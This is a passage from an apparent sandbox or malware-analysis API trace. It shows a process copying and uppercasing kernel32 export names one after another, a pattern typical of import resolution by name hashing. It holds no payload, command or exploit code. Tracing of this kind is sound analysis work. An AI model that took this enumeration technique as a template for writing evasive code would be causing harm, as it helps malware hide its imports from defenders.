lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0079.947] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0079.947] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0079.947] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0079.947] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0079.947] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0079.947] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0079.947] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0079.947] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0079.947] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0079.947] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0079.947] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0079.947] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0079.947] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0079.947] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0079.947] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0079.947] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0079.947] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0079.947] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0079.947] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0079.948] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0079.948] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0079.948] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0079.948] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0079.948] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0079.948] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0079.948] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0079.948] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0079.948] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0079.948] lstrlenA (lpString="COPYCONTEXT") returned 11 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0079.948] lstrlenA (lpString="COPYFILEA") returned 9 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0079.948] lstrlenA (lpString="COPYFILEEXA") returned 11 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0079.948] lstrlenA (lpString="COPYFILEEXW") returned 11 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0079.948] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0079.948] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0079.948] lstrlenA (lpString="COPYFILEW") returned 9 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0079.948] lstrlenA (lpString="COPYLZFILE") returned 10 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0079.948] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0079.948] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0079.949] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0079.949] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0079.949] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0079.949] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0079.949] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0079.949] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0079.949] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0079.949] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0079.949] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0079.949] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0079.949] lstrlenA (lpString="CREATEEVENTA") returned 12 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0079.949] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0079.949] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0079.949] lstrlenA (lpString="CREATEEVENTW") returned 12 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0079.949] lstrlenA (lpString="CREATEFIBER") returned 11 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0079.949] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0079.949] lstrlenA (lpString="CREATEFILEA") returned 11 [0079.949] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0079.950] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0079.950] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0079.950] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0079.950] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0079.950] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0079.950] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0079.950] lstrlenA (lpString="CREATEFILEW") returned 11 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0079.950] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0079.950] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0079.950] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0079.950] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0079.950] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0079.950] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0079.950] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.950] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.950] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.950] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.950] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.950] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.951] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.951] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.951] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.951] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.951] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.951] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.951] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.951] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.951] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.951] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.951] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.951] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.951] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.951] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.951] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.951] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.951] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.951] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.951] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.952] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.952] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.952] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.952] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.952] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.952] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.952] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.952] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.952] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.952] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.952] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.952] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.952] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.952] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.952] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.952] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.952] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.952] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.953] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.953] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.953] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.953] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.953] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.953] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.953] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.953] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.953] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.953] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.953] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.953] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.953] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.953] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.953] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.953] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.953] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.953] lstrlenA (lpString="DELETEATOM") returned 10 [0079.953] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.954] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.954] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.954] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.954] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.954] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.954] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" 